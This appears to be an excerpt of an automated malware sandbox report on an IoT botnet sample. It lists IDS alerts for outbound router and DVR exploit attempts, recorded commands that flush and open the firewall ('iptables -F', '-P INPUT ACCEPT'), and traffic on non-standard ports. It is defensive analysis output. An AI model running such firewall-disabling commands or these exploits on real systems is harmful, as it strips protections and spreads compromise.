Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:36638 -> 47.187.168.226:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:56868 -> 27.232.81.207:7547
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:46842 -> 40.89.136.53:80
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:59878 -> 23.77.241.19:80
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:40786 -> 5.76.238.20:80
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:32848 -> 179.113.73.67:7547
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:57816 -> 77.229.174.135:80
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:36068 -> 46.183.135.78:80
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:58284 -> 104.112.112.104:80
Source: Traffic	Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:51022 -> 172.65.160.12:8080
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38904 -> 87.239.16.181:80
Source: Traffic	Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:40422 -> 172.66.132.199:8080
Source: Traffic	Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:55808 -> 98.189.233.57:8080
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:38904 -> 87.239.16.181:80
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:46724 -> 34.226.28.131:80
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:50240 -> 203.56.69.38:80
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:58544 -> 133.32.60.216:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56528 -> 79.142.113.113:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56528 -> 79.142.113.113:80
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:56884 -> 27.232.81.207:7547
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57362 -> 208.103.191.99:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34454 -> 193.52.39.138:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55570 -> 197.255.152.175:80
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:59774 -> 104.228.28.226:80
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:57504 -> 47.203.5.227:7547
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55570 -> 197.255.152.175:80
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:54062 -> 197.27.100.58:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:49854 -> 181.24.19.129:7547
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:50250 -> 203.56.69.38:80
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:54066 -> 197.27.100.58:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:49858 -> 181.24.19.129:7547
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:43872 -> 23.208.117.54:80
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:50236 -> 203.56.69.38:80

Deletes all firewall rules

Source: /bin/sh (PID: 6231)	Args: iptables -F	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6281)	Args: iptables -F ufw-logging-deny	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6282)	Args: iptables -F ufw-logging-allow	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6283)	Args: iptables -F ufw-not-local	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6284)	Args: iptables -F ufw-user-logging-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6285)	Args: iptables -F ufw-user-limit-accept	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6286)	Args: iptables -F ufw-user-limit	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6287)	Args: iptables -F ufw-skip-to-policy-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6288)	Args: iptables -F ufw-reject-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6289)	Args: iptables -F ufw-after-logging-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6290)	Args: iptables -F ufw-after-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6291)	Args: iptables -F ufw-user-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6292)	Args: iptables -F ufw-before-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6293)	Args: iptables -F ufw-before-logging-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6294)	Args: iptables -F ufw-skip-to-policy-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6295)	Args: iptables -F ufw-reject-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6296)	Args: iptables -F ufw-after-logging-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6297)	Args: iptables -F ufw-after-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6298)	Args: iptables -F ufw-user-logging-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6299)	Args: iptables -F ufw-user-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6300)	Args: iptables -F ufw-before-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6301)	Args: iptables -F ufw-before-logging-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6302)	Args: iptables -F ufw-track-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6303)	Args: iptables -F ufw-track-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6304)	Args: iptables -F ufw-track-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6305)	Args: iptables -F ufw-skip-to-policy-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6306)	Args: iptables -F ufw-reject-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6307)	Args: iptables -F ufw-after-logging-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6308)	Args: iptables -F ufw-after-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6309)	Args: iptables -F ufw-user-logging-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6310)	Args: iptables -F ufw-user-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6311)	Args: iptables -F ufw-before-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6312)	Args: iptables -F ufw-before-logging-output	Jump to behavior

Executes the "iptables" command to insert, remove and/or manipulate rules

Source: /bin/sh (PID: 6256)	Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -P INPUT ACCEPT	Jump to behavior
Source: /bin/sh (PID: 6259)	Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -P FORWARD ACCEPT	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6281)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-logging-deny	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6282)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-logging-allow	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6283)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-not-local	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6284)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-user-logging-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6285)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-user-limit-accept	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6286)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-user-limit	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6287)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-skip-to-policy-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6288)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-reject-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6289)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-after-logging-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6290)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-after-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6291)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-user-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6292)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-before-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6293)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-before-logging-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6294)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-skip-to-policy-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6295)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-reject-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6296)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-after-logging-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6297)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-after-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6298)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-user-logging-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6299)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-user-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6300)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-before-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6301)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-before-logging-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6302)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-track-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6303)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-track-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6304)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-track-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6305)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-skip-to-policy-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6306)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-reject-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6307)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-after-logging-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6308)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-after-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6309)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-user-logging-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6310)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-user-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6311)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-before-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6312)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-before-logging-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6345)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -X ufw-logging-deny	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6346)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -X ufw-logging-allow	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6347)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -X ufw-not-local	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6348)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -X ufw-user-logging-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6349)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -X ufw-user-logging-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6350)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -X ufw-user-logging-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6351)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -X ufw-user-limit-accept	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6352)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -X ufw-user-limit	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6353)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -X ufw-user-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6354)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -X ufw-user-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6355)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -X ufw-user-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6356)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -X ufw-skip-to-policy-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6357)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -X ufw-skip-to-policy-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6358)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -X ufw-skip-to-policy-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6359)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -P INPUT ACCEPT	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6360)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -P OUTPUT ACCEPT	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6361)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -P FORWARD ACCEPT	Jump to behavior

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 40446 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 39230 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 52460 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 8081 -> 40446
Source: unknown	Network traffic detected: HTTP traffic on port 39230 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 52460 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 52062 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 52138 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 39488 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 47874 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 52000 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 33618 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 58274 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 48036 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 52086 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 41680 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 41220 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 36606 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 54046 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 33704 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 57358 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 41820 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 49390 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 39230 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 47702 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 41252 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 41864 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 54080 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 36712 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 53918 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 49504 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 47702
Source: unknown	Network traffic detected: HTTP traffic on port 55960 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 41868 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 33510 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 53930 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 57358 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 48036 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 33522 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 33510
Source: unknown	Network traffic detected: HTTP traffic on port 55476 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 33522
Source: unknown	Network traffic detected: HTTP traffic on port 53010 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 55704 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 57464 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 49352 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 47724 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 34846 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 49420 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 49352
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 47724
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 34846
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 49420
Source: unknown	Network traffic detected: HTTP traffic on port 34424 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 44832 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 53246 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 34850 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 34850
Source: unknown	Network traffic detected: HTTP traffic on port 45710 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 45726 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 58274 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 57538 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 58370 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 45092 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 57588 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 58330 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 39230 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 39488 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 58342 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 44484 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 58354 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 44494 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 8081 -> 58354
Source: unknown	Network traffic detected: HTTP traffic on port 53010 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 44494 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 55960 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 58608 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 45534 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 58608 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 59512 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 56140 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 48880 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 60680 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 40948 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 60724 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 58670 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 44132 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 59548 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 40996 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 44132
Source: unknown	Network traffic detected: HTTP traffic on port 44140 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 56182 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 48926 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 48880
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 44140
Source: unknown	Network traffic detected: HTTP traffic on port 46296 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 46756 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 48926
Source: unknown	Network traffic detected: HTTP traffic on port 46308 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 46772 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 40948 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 57822 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 40996 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 57828 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 53562 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 57700 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 40410 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 44832 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 40948 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 40996 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 57700 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 45534 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 39230 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 39488 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 40410 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 53010 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 55960 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 40948 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 40996 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 40996 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 40410 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 53562 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 57700 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 53640 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 40948 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 40996 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 40410 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 45534 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 44832 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 53640 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 57700 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 40410 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 40948 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 40996 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 39488 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 39230 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 53010 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 55960 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 53640 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 57700 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 40996 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 45534 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 44832 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 40410 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 40996 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 40948 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 53640 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 40996 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 57700 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 53010 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 39488 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 39230 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 55960 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 45534 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 40410 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 53640 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 40996 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 40948 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 44832 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 58602 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 59468 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 59518 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 59518
Source: unknown	Network traffic detected: HTTP traffic on port 47782 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 58636 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 42040 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 59468 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 47858 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 47782
Source: unknown	Network traffic detected: HTTP traffic on port 43940 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 56690 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 59394 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 59468
Source: unknown	Network traffic detected: HTTP traffic on port 43964 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 42124 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 47858
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 56690
Source: unknown	Network traffic detected: HTTP traffic on port 56728 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 59436 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 56728
Source: unknown	Network traffic detected: HTTP traffic on port 36432 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 49438 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 36586 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 36684 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 36612 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 44186 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 34564 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 36618 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 49438 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 44196 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 34580 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 49536 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 36530 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 36586 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 36684 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 34176 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 39198 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 44490 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 39226 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 36586 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 44510 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 36684 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 60632 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53206 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 37686 -> 7547
